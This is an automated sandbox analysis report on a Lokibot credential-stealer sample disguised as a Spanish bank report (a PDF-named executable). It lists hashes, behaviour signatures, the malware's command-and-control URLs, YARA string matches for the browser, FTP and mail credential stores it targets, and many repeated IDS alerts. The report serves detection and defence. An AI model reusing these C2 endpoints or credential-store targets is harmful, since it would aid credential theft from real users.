Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Informe bancario.pdf.exe

Overview

General Information

Sample Name:Informe bancario.pdf.exe
Analysis ID:651256
MD5:603fe9a434da79407213db7d4b907789
SHA1:812797eae86b27f54e5caadb021a4c00c31e4a7e
SHA256:07776cc1a0981b4143d63533a5e30f2deb4f545f4d27544cda60f5d07b602593
Tags:exeLoki
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Lokibot
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Yara detected Generic Downloader
C2 URLs / IPs found in malware configuration
Uses an obfuscated file name to hide its real file extension (double extension)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • Informe bancario.pdf.exe (PID: 6496 cmdline: "C:\Users\user\Desktop\Informe bancario.pdf.exe" MD5: 603FE9A434DA79407213DB7D4B907789)
    • Informe bancario.pdf.exe (PID: 6800 cmdline: C:\Users\user\Desktop\Informe bancario.pdf.exe MD5: 603FE9A434DA79407213DB7D4B907789)
    • Informe bancario.pdf.exe (PID: 6824 cmdline: C:\Users\user\Desktop\Informe bancario.pdf.exe MD5: 603FE9A434DA79407213DB7D4B907789)
  • cleanup
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://kossa.xyz/esi/pp/play.php"]}
SourceRuleDescriptionAuthorStrings
00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
        • 0x17936:$f1: FileZilla\recentservers.xml
        • 0x17976:$f2: FileZilla\sitemanager.xml
        • 0x15be6:$b2: Mozilla\Firefox\Profiles
        • 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
        • 0x15afa:$s4: logins.json
        • 0x169a4:$s6: wand.dat
        • 0x15424:$a1: username_value
        • 0x15414:$a2: password_value
        • 0x15a5f:$a3: encryptedUsername
        • 0x15acc:$a3: encryptedUsername
        • 0x15a72:$a4: encryptedPassword
        • 0x15ae0:$a4: encryptedPassword
        00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmpLoki_1Loki Payloadkevoreilly
        • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x153fc:$a2: last_compatible_version
        Click to see the 43 entries
        SourceRuleDescriptionAuthorStrings
        0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
        • 0x2fc98:$s1: http://
        • 0x33453:$s1: http://
        • 0x33e94:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
        • 0x2fca0:$s2: https://
        • 0x2fc98:$f1: http://
        • 0x33453:$f1: http://
        • 0x2fca0:$f2: https://
        0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpackINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
              • 0x32356:$f1: FileZilla\recentservers.xml
              • 0x32396:$f2: FileZilla\sitemanager.xml
              • 0x30606:$b2: Mozilla\Firefox\Profiles
              • 0x30370:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
              • 0x3051a:$s4: logins.json
              • 0x313c4:$s6: wand.dat
              • 0x2fe44:$a1: username_value
              • 0x2fe34:$a2: password_value
              • 0x3047f:$a3: encryptedUsername
              • 0x304ec:$a3: encryptedUsername
              • 0x30492:$a4: encryptedPassword
              • 0x30500:$a4: encryptedPassword
              Click to see the 126 entries
              No Sigma rule has matched
              Timestamp:192.168.2.3172.67.154.7249744802025381 06/23/22-17:54:38.472164
              SID:2025381
              Source Port:49744
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249767802024313 06/23/22-17:54:57.914899
              SID:2024313
              Source Port:49767
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349836802021641 06/23/22-17:55:40.617404
              SID:2021641
              Source Port:49836
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349843802025381 06/23/22-17:55:45.763232
              SID:2025381
              Source Port:49843
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249746802021641 06/23/22-17:54:42.346945
              SID:2021641
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249749802024313 06/23/22-17:54:47.375834
              SID:2024313
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249767802024318 06/23/22-17:54:57.914899
              SID:2024318
              Source Port:49767
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249770802024313 06/23/22-17:55:02.423254
              SID:2024313
              Source Port:49770
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349745802025381 06/23/22-17:54:39.886492
              SID:2025381
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249844802021641 06/23/22-17:55:50.553165
              SID:2021641
              Source Port:49844
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249749802024318 06/23/22-17:54:47.375834
              SID:2024318
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249762802025381 06/23/22-17:54:52.263394
              SID:2025381
              Source Port:49762
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249773802021641 06/23/22-17:55:09.049678
              SID:2021641
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249877802021641 06/23/22-17:56:13.789082
              SID:2021641
              Source Port:49877
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349876802024318 06/23/22-17:56:11.073086
              SID:2024318
              Source Port:49876
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349876802024313 06/23/22-17:56:11.073086
              SID:2024313
              Source Port:49876
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349778802025381 06/23/22-17:55:15.087771
              SID:2025381
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249859802021641 06/23/22-17:55:58.152468
              SID:2021641
              Source Port:49859
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249771802024318 06/23/22-17:55:04.009923
              SID:2024318
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249768802024318 06/23/22-17:54:59.413778
              SID:2024318
              Source Port:49768
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349876802025381 06/23/22-17:56:11.073086
              SID:2025381
              Source Port:49876
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349835802021641 06/23/22-17:55:36.607918
              SID:2021641
              Source Port:49835
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349775802021641 06/23/22-17:55:12.061012
              SID:2021641
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349780802024318 06/23/22-17:55:16.534873
              SID:2024318
              Source Port:49780
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249875802024313 06/23/22-17:56:08.656582
              SID:2024313
              Source Port:49875
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249768802024313 06/23/22-17:54:59.413778
              SID:2024313
              Source Port:49768
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249816802021641 06/23/22-17:55:26.329557
              SID:2021641
              Source Port:49816
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249875802024318 06/23/22-17:56:08.656582
              SID:2024318
              Source Port:49875
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249743802025381 06/23/22-17:54:37.108830
              SID:2025381
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249771802025381 06/23/22-17:55:04.009923
              SID:2025381
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249757802024318 06/23/22-17:54:50.135454
              SID:2024318
              Source Port:49757
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249770802024318 06/23/22-17:55:02.423254
              SID:2024318
              Source Port:49770
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349745802024313 06/23/22-17:54:39.886492
              SID:2024313
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349774802021641 06/23/22-17:55:10.726793
              SID:2021641
              Source Port:49774
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249769802021641 06/23/22-17:55:00.833023
              SID:2021641
              Source Port:49769
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249772802025381 06/23/22-17:55:07.425069
              SID:2025381
              Source Port:49772
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249852802021641 06/23/22-17:55:55.592533
              SID:2021641
              Source Port:49852
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349780802024313 06/23/22-17:55:16.534873
              SID:2024313
              Source Port:49780
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349872802025381 06/23/22-17:56:02.086134
              SID:2025381
              Source Port:49872
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349745802024318 06/23/22-17:54:39.886492
              SID:2024318
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249757802024313 06/23/22-17:54:50.135454
              SID:2024313
              Source Port:49757
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349792802021641 06/23/22-17:55:18.935502
              SID:2021641
              Source Port:49792
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349881802021641 06/23/22-17:56:16.928509
              SID:2021641
              Source Port:49881
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249882802024313 06/23/22-17:56:19.809048
              SID:2024313
              Source Port:49882
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349776802024318 06/23/22-17:55:13.438859
              SID:2024318
              Source Port:49776
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349813802024313 06/23/22-17:55:22.328153
              SID:2024313
              Source Port:49813
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249770802025381 06/23/22-17:55:02.423254
              SID:2025381
              Source Port:49770
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349776802024313 06/23/22-17:55:13.438859
              SID:2024313
              Source Port:49776
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249877802025381 06/23/22-17:56:13.789082
              SID:2025381
              Source Port:49877
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349883802021641 06/23/22-17:56:20.757705
              SID:2021641
              Source Port:49883
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349813802024318 06/23/22-17:55:22.328153
              SID:2024318
              Source Port:49813
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249741802024317 06/23/22-17:54:33.910153
              SID:2024317
              Source Port:49741
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249747802021641 06/23/22-17:54:44.305987
              SID:2021641
              Source Port:49747
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249845802024313 06/23/22-17:55:53.427872
              SID:2024313
              Source Port:49845
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249744802021641 06/23/22-17:54:38.472164
              SID:2021641
              Source Port:49744
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249741802024312 06/23/22-17:54:33.910153
              SID:2024312
              Source Port:49741
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349865802024313 06/23/22-17:56:00.557524
              SID:2024313
              Source Port:49865
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249762802024313 06/23/22-17:54:52.263394
              SID:2024313
              Source Port:49762
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349865802024318 06/23/22-17:56:00.557524
              SID:2024318
              Source Port:49865
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249767802025381 06/23/22-17:54:57.914899
              SID:2025381
              Source Port:49767
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249773802025381 06/23/22-17:55:09.049678
              SID:2025381
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249845802024318 06/23/22-17:55:53.427872
              SID:2024318
              Source Port:49845
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349766802021641 06/23/22-17:54:56.372364
              SID:2021641
              Source Port:49766
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249831802021641 06/23/22-17:55:33.546351
              SID:2021641
              Source Port:49831
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249762802024318 06/23/22-17:54:52.263394
              SID:2024318
              Source Port:49762
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249771802024313 06/23/22-17:55:04.009923
              SID:2024313
              Source Port:49771
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349803802021641 06/23/22-17:55:20.890777
              SID:2021641
              Source Port:49803
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349778802024313 06/23/22-17:55:15.087771
              SID:2024313
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249769802025381 06/23/22-17:55:00.833023
              SID:2025381
              Source Port:49769
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349778802024318 06/23/22-17:55:15.087771
              SID:2024318
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249742802021641 06/23/22-17:54:35.573404
              SID:2021641
              Source Port:49742
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249773802024318 06/23/22-17:55:09.049678
              SID:2024318
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349837802024318 06/23/22-17:55:42.276335
              SID:2024318
              Source Port:49837
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349792802025381 06/23/22-17:55:18.935502
              SID:2025381
              Source Port:49792
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349765802024318 06/23/22-17:54:54.716737
              SID:2024318
              Source Port:49765
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349843802024313 06/23/22-17:55:45.763232
              SID:2024313
              Source Port:49843
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349872802021641 06/23/22-17:56:02.086134
              SID:2021641
              Source Port:49872
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349837802024313 06/23/22-17:55:42.276335
              SID:2024313
              Source Port:49837
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349881802025381 06/23/22-17:56:16.928509
              SID:2025381
              Source Port:49881
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349765802024313 06/23/22-17:54:54.716737
              SID:2024313
              Source Port:49765
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249743802024313 06/23/22-17:54:37.108830
              SID:2024313
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249772802021641 06/23/22-17:55:07.425069
              SID:2021641
              Source Port:49772
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249873802024313 06/23/22-17:56:04.198158
              SID:2024313
              Source Port:49873
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249875802025381 06/23/22-17:56:08.656582
              SID:2025381
              Source Port:49875
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249743802024318 06/23/22-17:54:37.108830
              SID:2024318
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349843802024318 06/23/22-17:55:45.763232
              SID:2024318
              Source Port:49843
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249873802024318 06/23/22-17:56:04.198158
              SID:2024318
              Source Port:49873
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349837802025381 06/23/22-17:55:42.276335
              SID:2025381
              Source Port:49837
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249859802024313 06/23/22-17:55:58.152468
              SID:2024313
              Source Port:49859
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249743802021641 06/23/22-17:54:37.108830
              SID:2021641
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249746802024318 06/23/22-17:54:42.346945
              SID:2024318
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249844802024318 06/23/22-17:55:50.553165
              SID:2024318
              Source Port:49844
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249859802024318 06/23/22-17:55:58.152468
              SID:2024318
              Source Port:49859
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249746802024313 06/23/22-17:54:42.346945
              SID:2024313
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349883802025381 06/23/22-17:56:20.757705
              SID:2025381
              Source Port:49883
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249844802024313 06/23/22-17:55:50.553165
              SID:2024313
              Source Port:49844
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249749802021641 06/23/22-17:54:47.375834
              SID:2021641
              Source Port:49749
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349836802024318 06/23/22-17:55:40.617404
              SID:2024318
              Source Port:49836
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249747802025381 06/23/22-17:54:44.305987
              SID:2025381
              Source Port:49747
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249845802025381 06/23/22-17:55:53.427872
              SID:2025381
              Source Port:49845
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249770802021641 06/23/22-17:55:02.423254
              SID:2021641
              Source Port:49770
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349836802024313 06/23/22-17:55:40.617404
              SID:2024313
              Source Port:49836
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249882802025381 06/23/22-17:56:19.809048
              SID:2025381
              Source Port:49882
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249816802024313 06/23/22-17:55:26.329557
              SID:2024313
              Source Port:49816
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249877802024313 06/23/22-17:56:13.789082
              SID:2024313
              Source Port:49877
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249773802024313 06/23/22-17:55:09.049678
              SID:2024313
              Source Port:49773
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349766802025381 06/23/22-17:54:56.372364
              SID:2025381
              Source Port:49766
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249816802024318 06/23/22-17:55:26.329557
              SID:2024318
              Source Port:49816
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249767802021641 06/23/22-17:54:57.914899
              SID:2021641
              Source Port:49767
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349778802021641 06/23/22-17:55:15.087771
              SID:2021641
              Source Port:49778
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349876802021641 06/23/22-17:56:11.073086
              SID:2021641
              Source Port:49876
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349775802025381 06/23/22-17:55:12.061012
              SID:2025381
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349803802025381 06/23/22-17:55:20.890777
              SID:2025381
              Source Port:49803
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249877802024318 06/23/22-17:56:13.789082
              SID:2024318
              Source Port:49877
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249741802025381 06/23/22-17:54:33.910153
              SID:2025381
              Source Port:49741
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349835802024313 06/23/22-17:55:36.607918
              SID:2024313
              Source Port:49835
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249762802021641 06/23/22-17:54:52.263394
              SID:2021641
              Source Port:49762
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349792802024318 06/23/22-17:55:18.935502
              SID:2024318
              Source Port:49792
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349881802024318 06/23/22-17:56:16.928509
              SID:2024318
              Source Port:49881
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349775802024318 06/23/22-17:55:12.061012
              SID:2024318
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349835802024318 06/23/22-17:55:36.607918
              SID:2024318
              Source Port:49835
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249875802021641 06/23/22-17:56:08.656582
              SID:2021641
              Source Port:49875
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349775802024313 06/23/22-17:55:12.061012
              SID:2024313
              Source Port:49775
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349865802025381 06/23/22-17:56:00.557524
              SID:2025381
              Source Port:49865
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249768802021641 06/23/22-17:54:59.413778
              SID:2021641
              Source Port:49768
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249852802024318 06/23/22-17:55:55.592533
              SID:2024318
              Source Port:49852
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3172.67.154.7249873802025381 06/23/22-17:56:04.198158
              SID:2025381
              Source Port:49873
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.21.40.15349745802021641 06/23/22-17:54:39.886492
              SID:2021641
              Source Port:49745
              Destination Port:80
              Protocol:TCP
